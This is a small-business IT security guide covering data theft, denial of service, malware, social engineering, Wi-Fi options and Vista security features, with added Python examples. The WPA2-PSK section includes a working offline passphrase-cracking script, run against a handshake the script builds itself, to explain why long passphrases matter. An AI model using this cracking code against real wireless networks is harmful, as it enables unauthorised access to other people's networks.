Too many businesses take a “fire-fighting” approach to IT security. They’ll spend a minimum on securing their systems, then react after an incident has taken place.
With a long-term investment you must cover all existing threats and also anticipate some potential risks that may arise in the future. Is your business changing? Are you reaching new customers? Deploying new services? Adding more IT infrastructure? All of these elements may introduce new threats or make your business the target of an attack.
Data theft
The most obvious e-security threat to business is theft of sensitive data. Customer contact databases, confidential email, internal financial figures and unique plans or intellectual property could be very attractive to unscrupulous competitors or perpetrators of fraud. Data thieves take whichever route is cheapest: dumpster diving (searching through rubbish for printouts and paper-based information), recovering "deleted" data from decommissioned computers (deleting a file removes only its directory entry; the contents stay on the disk until overwritten), hacking into systems, and courting disgruntled employees with bribes or coercion. Data theft is a wide-ranging problem affecting many aspects of IT security. Of particular concern in this area are unsecured or poorly secured wireless networks.
Identity theft
With today's online banking, information services and product sales occurring so frequently via the Internet, there are numerous places where criminals can capture portions of your personal information. Your date of birth, middle name, income, home address, phone numbers and financial account numbers can all be captured by a determined thief. With that information aggregated, the criminal can attempt to access your accounts or act in your name, using your personal data to support their story. For example, when you phone a call centre to make changes to your accounts, you may be asked for a piece of personal information to confirm your identity. The expert identity thief will have this information.
Denial of service and nuisance attacks
Denial of service attacks are typically an attempt to interrupt a business system such as a corporate website or e-commerce server. The attacker exploits the way IP communications work: every connection request to a website or system consumes a small amount of that system's resources. To perform the attack, a number of computers are coordinated to send the target a massive stream of spurious requests, and the system exhausts its resources trying to answer them all. The result is that genuine users or customers are denied access by the flood of traffic tying the system up. Service downtime from denial of service attacks can be financially expensive and damaging to your business's reputation. A router or firewall feature called Stateful Packet Inspection (SPI) helps with some of these attacks: it drops packets that do not belong to a connection it has seen properly opened, which defeats crude spoofed-packet and half-open connection floods. It cannot help once the flood saturates your Internet link, because the packets are dropped only after they have crossed it; at that point only your ISP or an upstream filtering service can shed the traffic.
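To make the mechanism concrete, here is an added example (it is not from the original article) that runs two detectors over web server log lines: a per-source rate check of the kind a router or SPI firewall can apply, and an aggregate check on the total request rate. The log format, the timestamps and the client addresses (documentation ranges 192.0.2.0/24, 198.51.100.0/24 and 203.0.113.0/24) are all constructed for the example, not captured traffic.

```python
"""Request-flood detection over web server log lines (added example)."""
from collections import Counter, defaultdict
import statistics

START = 1_180_000_000          # constructed epoch timestamp, a multiple of 5


def parse_line(line):
    """Constructed log format: '<epoch seconds> <client ip> <method> <path> <status>'."""
    ts, ip, _method, _path, _status = line.split()
    return int(ts), ip


def per_source_offenders(lines, window=5, limit=20):
    """Sources that send more than `limit` requests in any `window`-second bucket.

    This is the per-client check a router or SPI firewall can make. It catches
    a single noisy host but is blind to a botnet whose members each stay under
    the limit.
    """
    buckets = defaultdict(Counter)
    for ts, ip in map(parse_line, lines):
        buckets[ts // window][ip] += 1
    offenders = {}
    for counts in buckets.values():
        for ip, n in counts.items():
            if n > limit:
                offenders[ip] = max(offenders.get(ip, 0), n)
    return offenders


def aggregate_spike(lines, window=5, factor=10):
    """Compare the busiest bucket with the median bucket over the whole period.

    Returns (peak, median, spike). A spike with no per-source offender is the
    signature of a distributed flood.
    """
    per_bucket = Counter(ts // window for ts, _ip in map(parse_line, lines))
    counts = sorted(per_bucket.values())
    median = statistics.median(counts)
    return counts[-1], median, counts[-1] > factor * median


# --- constructed traffic (documentation address ranges, not real clients) ---

def legit_traffic(seconds=60, clients=5):
    """One request per second, spread over `clients` hosts in 192.0.2.0/24."""
    return [f"{START + t} 192.0.2.{t % clients + 1} GET /index.html 200"
            for t in range(seconds)]


def single_source_flood():
    """Baseline plus one host sending 40 requests a second for 5 seconds."""
    flood = [f"{START + 30 + s} 203.0.113.9 GET /search?q=x 200"
             for s in range(5) for _ in range(40)]
    return legit_traffic() + flood


def distributed_flood():
    """Baseline plus 40 bots in 198.51.100.0/24, each sending only 2 requests a second."""
    flood = [f"{START + 30 + s} 198.51.100.{bot} GET /login 200"
             for s in range(5) for bot in range(1, 41) for _ in range(2)]
    return legit_traffic() + flood


if __name__ == "__main__":
    for name, log in [("single source", single_source_flood()),
                      ("distributed", distributed_flood())]:
        print(name, per_source_offenders(log), aggregate_spike(log))
```

The single-source flood shows up in both checks. The distributed flood, where forty hosts each send only two requests a second, produces no per-source offender at all and is visible only as the eighty-fold jump in total traffic; that is why blocking individual clients on your own router is no answer to a distributed attack.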
Malware
Malware is a blanket term for all forms of malicious software that can compromise a computer. It covers viruses, worms, trojans, spyware and rootkits (those written for financial gain are sometimes grouped as crimeware), and it's anything designed to fool the user, take control of their computer, steal information or (less commonly) destroy data. Malware is the primary reason that virus-scanning, spyware-scanning and firewall software packages are a cornerstone of the software business today.
A good package will scan incoming email and its attachments, monitor your network ports for unusual activity, catch applications stealthily installing themselves in the background of your user session, and catch code attempting to hijack your computer through a website. Increasingly, security software also detects and blocks phishing sites, which pose as authentic versions of financial websites in a bid to capture login names and passwords.
Data theft from stolen hardware
When entire computers such as mobile workers' laptops can so easily be stolen, protecting portable devices that hold personal and business information is critical. A Windows logon password protects only the logon screen, not the data: a thief can remove the drive and read it from another computer, or boot from a CD and reset the password. Thus, for a business with a significant mobile workforce, hard drive encryption is an excellent idea. Products such as Bitlocker Drive Encryption encrypt the entire contents of a drive and prevent unauthorised access to it. After a computer and its hard drive are decommissioned, it's important to wipe the drive entirely – there's no telling whose hands it may end up in. Deleting files or reformatting is not wiping: it removes only the index, and the contents can be recovered with standard tools (recovering data this way is described as forensic recovery). Use a purpose-built utility that overwrites the whole drive. Whether anything survives several overwrites in a laboratory is debated; for drives that held the most sensitive data, physical destruction removes the doubt, and a drive that was fully encrypted can be made unreadable simply by destroying its key.
Social engineering
Mastered by the infamous hacker Kevin Mitnick, social engineering refers to the methods hackers and criminals use to talk people out of the information they need. Initiating a phone call or email to an employee at the organisation they are targeting, the successful social engineer poses as a bona fide correspondent whom employees are likely to trust, displaying clear subject matter knowledge and dropping the names of other known employees to lend weight to their story. With a persuasive pitch, the miscreant can gain passwords, details of internal systems, names of key people and sensitive inside information. A successful application of this approach can gain the hacker far more valuable information than a random dumpster dive or port scan ever will. No software stops it. The defence is staff awareness backed by procedure: a rule that passwords are never given out over the phone or by email, and that unexpected requests are verified by calling the requester back on a number from your own directory, not the one they supplied. People naturally want to help other people, and social engineers exploit that tendency.
TOP 5
Security myths
1. “You can’t receive an infection just by visiting a web site.”
UNTRUE Web sites today are a minefield of malicious code, delivered through JavaScript, Java, ActiveX and Macromedia Flash exploits. A "drive-by download" needs no click at all if the browser or one of its plug-ins is unpatched, so keep both up to date; and when a piece of interactive content shows the note "click here to activate this control", be wary.
2. “Powerpoint files are safe.”
UNTRUE PowerPoint files are just as able as any other Office file to carry malicious macro code or an embedded trojan, so a .ppt attachment deserves the same scrutiny as a .doc or .xls.
3. “Unplugging my computer from the wall protects me.”
UNTRUE If your computer has already been compromised, it is wide open to the raw Internet. Unplugging it stops traffic only for as long as the cable is out; the moment it is plugged back in, the infection resumes whatever it was doing, unless the computer has been properly disinfected in the meantime. Unplugging is a sensible first response while you investigate, but it is no substitute for up-to-date security software, patches and an understanding of the threats.
4. “Funny ‘joke’ files from my friends won’t be infected.”
UNTRUE People may not scan files that come from a trusted source, but this kind of thinking could be the reason none of your contacts scanned that file either. Be especially wary of programs with the extensions .VBS, .COM, .BAT, .SCR and .EXE, and remember that Windows hides known extensions by default, so a file named joke.jpg.exe is shown as joke.jpg.
5. “My network is so small, no one would bother hacking it.”
UNTRUE “Security by obscurity” is a problematic attitude that can lead to poorly secured systems becoming host “zombie” computers for massive spam mailouts or generators of denial-of-service attacks. No matter how small, any computer system can be attractive for hackers as a system for sending traffic or storing contraband data.
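As an added example that is not part of the magazine text, the script below shows the checks a mail gateway (the attachment scanning mentioned under Malware) or a cautious user would apply to an attachment name before trusting a "joke" file: it recovers the real extension the way Windows would, simulates what Explorer displays with "Hide extensions for known file types" switched on (the default), and flags names that carry a bidirectional override character, which reverses the displayed order of everything after it. The file names are constructed, and the extension list is a starting point rather than a complete one.

```python
"""Attachment-name checks for the 'joke file' problem (added example)."""
import os

# Extensions Windows runs directly or hands to a script host; not exhaustive.
EXECUTABLE_EXTS = {
    ".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".msi", ".cpl", ".lnk",
    ".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta", ".ps1",
}
# Unicode bidirectional overrides: "photo<RLO>gpj.scr" displays as "photorcs.jpg".
BIDI_OVERRIDES = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e"}


def normalise(name):
    """Windows silently strips trailing dots and spaces, so 'joke.exe.' is joke.exe."""
    return name.rstrip(". ")


def true_extension(name):
    """The extension Windows will act on, lower-cased."""
    return os.path.splitext(normalise(name))[1].lower()


def explorer_display_name(name):
    """What Explorer shows with known extensions hidden: only the last one disappears,
    so 'joke.jpg.exe' is displayed as 'joke.jpg'."""
    root, ext = os.path.splitext(normalise(name))
    return root if ext else name


def assess_attachment(name):
    """Return a list of reasons to distrust the name; an empty list means no flag raised."""
    reasons = []
    ext = true_extension(name)
    shown = explorer_display_name(name)
    if ext in EXECUTABLE_EXTS:
        reasons.append(f"executable type {ext}")
        if os.path.splitext(shown)[1]:
            reasons.append(f"double extension: Explorer shows it as {shown!r}")
    if any(ch in name for ch in BIDI_OVERRIDES):
        reasons.append("contains a bidirectional override character; displayed name is misleading")
    return reasons


if __name__ == "__main__":
    # Constructed names, not real attachments.
    for sample in ["report.pdf", "joke.jpg.exe", "joke.exe.", "photo\u202egpj.scr"]:
        print(repr(sample), "->", assess_attachment(sample) or "ok")
```

Note that the checks act on the name only; they are a cheap first filter in front of a scanner, not a replacement for one, because a genuinely named .doc or .ppt can still carry malicious content.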
Firewalls
A firewall, whether a dedicated appliance, a feature of your router, or software on each desktop, controls traffic in and out of your network. The sound policy is default deny: permit only the ports your specific business applications use and block everything else, which limits an intruder's ability to penetrate the network and cause havoc. Firewalls can also block unauthorised outbound traffic, preventing an infected computer from sending a barrage of traffic across the network or into the Internet. The various software firewalls that run on a user's desktop computer are useful for exactly this, since they can tell which program on the machine is trying to make a connection.
Biometric scanners
Usernames and passwords are a common tool to secure access to resources. However, this kind of information is faceless, hence it can be compromised and then used by any individual to gain access. Biometrics is a way of tying the individual user's identity more closely to the account and the privileges connected to it. The most common implementation of biometric access control is the fingerprint scanner, while more sophisticated systems involve full palm of the hand, iris or retinal scans. One caveat: a fingerprint can be copied and, unlike a password, cannot be changed once it has been, so biometrics work best as a second factor alongside something the user knows rather than as the only check.
Internet security suites
With the wide range of "point solutions" available today (individual software tools that secure one piece of your system's puzzle, such as a firewall or an anti-virus scanner), it makes sense to buy a complete package of all the required components from a single vendor. This way you know that they are interoperable, you can easily track your expenditure on them, and they will usually update themselves through a common application, simplifying administration.
Q&A Which wireless security is best?
When using Wi-Fi wireless networking, security can be a problem. By default, these systems will often have no security applied, allowing any station to log on and access the network resources. Obviously this is less than ideal! We explore some of the wireless security mechanisms below and explain their protection value.
Changing the SSID
The Service Set Identifier is the name that identifies each wireless network. Changing it from the default is essential housekeeping (the default often reveals the router model, and hence its known weaknesses), but it does not secure the network. An unsecured access point broadcasts its SSID in the clear, and even a "hidden" SSID is transmitted in the clear whenever a client connects, so any wireless adapter nearby can read it and attempt to join.
MAC address filtering
MAC stands for Media Access Control: every network adapter has a MAC address, which you can find in the adapter's configuration settings. Restricting the wireless network to a list of known MAC addresses is a modest hurdle suitable only for very small networks. It is not a strong control, because MAC addresses are transmitted in the clear on every frame and the address of a wireless adapter can be changed in software, so an attacker can read a permitted address off the air and clone it in minutes.
WEP
Wired Equivalent Privacy was one of the first encryption methods to be used with wireless networking, but it was shown to have fundamental flaws (PC Authority January 2007, page 48). If you’re serious about wireless networking security, do not use this standard.
WPA2-PSK
Wi-Fi Protected Access 2 with a Pre-Shared Key is a reliable way to secure a small wireless network of fewer than ten users. Every user is given the same SSID and passphrase, from which the keys for this system's strong traffic encryption are derived. The drawbacks are two. First, the passphrase must be changed and redistributed to everyone whenever a user leaves. Second, anyone who records a client joining the network can test candidate passphrases against that recording offline, at leisure, so a short or dictionary passphrase defeats the strong encryption; use a long random passphrase (the standard allows up to 63 characters). WPA2 is the Wi-Fi Alliance's name for the IEEE 802.11i standard (IEEE: Institute of Electrical and Electronics Engineers).
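The following is an added example, not code from the article or from any Wi-Fi vendor, showing why the passphrase is the whole of WPA2-PSK's security. It implements the key derivation from IEEE 802.11i (PBKDF2 of the passphrase salted with the SSID, then the pairwise key expansion and the EAPOL-Key MIC) and runs a list of candidate passphrases against a handshake. The handshake is constructed inside the script (fixed MAC addresses, nonces and a stand-in EAPOL-Key body) rather than captured from the air, and the SSID "SmallBizNet", the two passphrases and the word list are made up; the passphrase-to-PMK step is checked against the test vector published in the standard.

```python
"""WPA2-PSK offline passphrase attack against a constructed handshake (added example)."""
import hashlib
import hmac
from dataclasses import dataclass


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PRF-384 from 802.11i for CCMP: HMAC-SHA1 blocks keyed with the PMK over
    'Pairwise key expansion' || 0x00 || min(MACs) || max(MACs) || min(nonces) || max(nonces) || i."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    blocks = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(3))
    return blocks[:48]


def eapol_mic(kck, eapol_frame):
    """WPA2 (AES-CCMP) key MIC: first 16 bytes of HMAC-SHA1 keyed with the KCK
    (the first 16 bytes of the PTK) over the EAPOL-Key frame with its MIC field zeroed."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


@dataclass(frozen=True)
class Handshake:
    """What an eavesdropper keeps from the 4-way handshake: all of it travels unencrypted."""
    ssid: str
    ap_mac: bytes
    sta_mac: bytes
    anonce: bytes
    snonce: bytes
    eapol: bytes   # client's EAPOL-Key message with the MIC field zeroed
    mic: bytes     # the MIC the client actually sent


def record_handshake(passphrase, ssid):
    """Constructed stand-in for a packet capture: fixed MACs and nonces, a dummy EAPOL body."""
    ap_mac = bytes.fromhex("02a1b2c3d4e5")
    sta_mac = bytes.fromhex("02f6e5d4c3b2")
    anonce = hashlib.sha256(b"constructed ANonce").digest()
    snonce = hashlib.sha256(b"constructed SNonce").digest()
    eapol = b"\x01\x03" + b"constructed EAPOL-Key message 2, MIC zeroed: " + snonce
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return Handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol, eapol_mic(kck, eapol))


def crack(hs: Handshake, wordlist):
    """Return the first candidate passphrase whose derived MIC matches the recording, else None."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, hs.ssid)
        kck = ptk_from_pmk(pmk, hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, hs.eapol), hs.mic):
            return candidate
    return None


WORDLIST = ["password", "letmein", "office2007", "Welcome1", "sunshine"]  # constructed

if __name__ == "__main__":
    weak = record_handshake("office2007", "SmallBizNet")
    strong = record_handshake("xG7!pq2#mLw9$zR4vB", "SmallBizNet")
    print("weak passphrase recovered:", crack(weak, WORDLIST))      # office2007
    print("strong passphrase recovered:", crack(strong, WORDLIST))  # None
```

Each candidate costs one PBKDF2 run of 4096 HMAC iterations, so an ordinary desktop tests thousands of passphrases a second and a purpose-built rig many more. Nothing in the protocol slows the attacker down further; only the size of the passphrase space protects the network, which is why a long random passphrase matters and why per-user credentials are preferable for larger sites.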
802.1X and RADIUS authentication
While small Wi-Fi networks are manageable with a single access password for all users, for larger sites it's essential to roll out a server that authenticates each user individually and lets you add and remove users as needed. This requires the 802.1X standard for network access control and a RADIUS server (Remote Authentication Dial-In User Service) holding the list of users and their individual passwords. The combination is marketed as WPA2-Enterprise: each user authenticates with their own credentials or certificate and receives their own encryption keys, so when someone leaves you disable one account rather than re-keying every device.
Windows Vista Security features
Security is one of the top selling points of Microsoft's latest operating system. With 95 percent of the world's business community using Windows, this system is a daily target for attackers and exploit writers. Controlling rogue code, protecting the hard drive contents of a lost or stolen machine and managing Windows' included security measures can ensure your business's computing experience is as secure as possible.
Vista’s User Account Control (UAC)
UAC is a new Vista feature that tackles the problem of code running with administrator rights without your knowledge. Even when you are logged on as an administrator, programs run with ordinary user privileges, and any action that needs administrator rights (installing software, changing system settings, writing to protected folders) triggers a prompt that you must approve before it proceeds. Malware that reaches the machine can still run, but it is confined to the user's own files unless you approve its elevation, so a prompt appearing when you did not start anything is a warning sign and should be refused. This is an excellent control measure for spyware and malware, however it is fairly heavy-handed: it prompts for all kinds of actions, including legitimate Windows Vista programs, and can rapidly become laborious if you often add new programs to your system. Still, for users who rarely change their system configuration, UAC adds an all-new level of security.
Vista’s Windows Firewall
While the Windows XP firewall was widely derided as being about as effective as a brick wall one brick high (it filtered inbound traffic only), the Windows Vista version of Windows Firewall has evolved in sophistication. It now supports rules per application and per direction, so it can stop a program on the computer from opening connections outward, which is often the first sign of malware trying to spread or report home. Note that outbound blocking is available but not switched on by default; it must be enabled in the Windows Firewall with Advanced Security console. Blocking such an attempt can prevent malware from spreading to other computers and escalating the problem.
Vista’s Windows Update
Windows Update was one of the poster-child features of Windows XP, rolling all of the labour-intensive application patches into a slick web interface and ActiveX control that downloads and installs updates fairly seamlessly. New features of Windows Update in Vista include configurable scheduling of update times. Updating your system software regularly during office down-time makes the process less intrusive and minimises its impact on your computer's performance. You can also have updates downloaded automatically but installed only after you have reviewed and approved them.
Windows Defender
Spyware is a nefarious form of malware that rose to prominence in the years after Windows 95. Typically arriving via malicious code on a website or bundled with "free" software, spyware can mine personal information on your computer, track the Internet sites you visit and transmit this information to a central collection point. Windows Defender is a Microsoft product that offers on-access spyware scanning, as well as the facility to remove detected malicious files. Windows Defender also has an interesting feedback mechanism whereby its users can submit reports of suspected spyware activity by particular programs.
Microsoft Internet Explorer 7
Internet Explorer 7, as a benchmark application for website compatibility, has a number of new security features. Protection against phishing sites is the most notable addition: the URL of each site the user visits is compared against a database of known spoof sites that mimic real financial institutions, and when a match is found the phishing filter displays a warning about the loaded site, allowing the user to decide whether to trust it. Internet Explorer 7 also supports the new Extended Validation (EV) certificates, which provide stronger authentication of legitimate web sites, and it limits the capabilities of the often-hijacked ActiveX control set, notifying you when a new or unusual control is being activated. On Windows Vista, IE7 also runs in Protected Mode, a low-privilege mode in which the browser cannot write to most of the file system or registry, which limits what a hijacked browser can do.
Bitlocker drive encryption
Bitlocker is a new feature that encrypts the entire contents of a hard drive. The drive is unlocked only when the computer's boot-time integrity checks pass (and, optionally, when a PIN or USB key is presented), so unauthorised people cannot read any information on a lost or stolen drive.
Bitlocker has features for tamper-resistance, supporting Trusted Platform Module hardware and running integrity checks on early boot components, to avoid circumvention by a variety of methods. It encrypts not only the operating system files but also the swap file and hibernation file, which can contain vital and sensitive information. Two caveats: Bitlocker protects data at rest only, so once Windows has booted and the user is logged on the drive reads normally, and it is no defence against malware or an unlocked, unattended laptop; and the recovery key must be kept somewhere other than the laptop, because without it a drive whose TPM fails or whose boot files change cannot be unlocked.
Bitlocker is only available in Windows Vista Ultimate and Enterprise editions.
Business Startup Guide continues: Imaging & Printing